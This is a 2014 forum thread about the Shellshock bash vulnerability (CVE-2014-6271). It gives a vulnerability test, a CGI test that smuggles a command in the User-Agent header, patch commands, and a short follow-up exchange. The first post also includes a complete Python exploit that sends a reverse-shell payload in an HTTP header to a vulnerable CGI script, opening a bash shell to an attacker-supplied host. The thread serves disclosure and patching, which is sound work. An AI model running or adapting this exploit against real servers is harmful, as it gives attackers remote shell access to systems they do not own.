Armaal Posted September 25, 2014 Posted September 25, 2014 (edited) Stephane Chazelas U.K. @ robotics company SeeByte find a bug in BASH https://securityblog.redhat.com/ A quick test to check if you are vulnerable (debian, ubuntu, unix (FreeBSD).. ) env x='() { :;}; echo vulnerable' bash -c "echo this is a test"if your terminal respond : vulnerable you are vulnerableThe problem is the following -> the code continue to execute after the ; -> and here you can inject malicious code ... Also a CGI-TEST wget -U "() { test;};/usr/bin/touch /tmp/VULNERABLE" myserver/cgi-bin/test You have to update your bash by paquets in couple of daysCentOS : # yum update bash Debian : # apt-get update bash FreeBSD : # portsnap fetch updatehttps://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025 ------- Example of attack could be perform (in this example a Reverse Shell by http header) #CVE-2014-6271 cgi-bin reverse shell import httplib,urllib,sys if (len(sys.argv)<4): print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0] print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0] exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3] headers = {"Content-type": "application/x-www-form-urlencoded", "test":reverse_shell } conn.request("GET",sys.argv[2],headers=headers) res = conn.getresponse() print res.status, res.reason data = res.read() print data Edited September 25, 2014 by Armaal Quote
cooper Posted September 25, 2014 Posted September 25, 2014 See also this topic in the security sub-forum here which contains more information and a variation of the quick tests which proves that the current fix doesn't completely solve the problem. Quote
Armaal Posted September 25, 2014 Author Posted September 25, 2014 See also this topic in the security sub-forum here which contains more information and a variation of the quick tests which proves that the current fix doesn't completely solve the problem. Thanks I have not seen that topic before ;-) Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.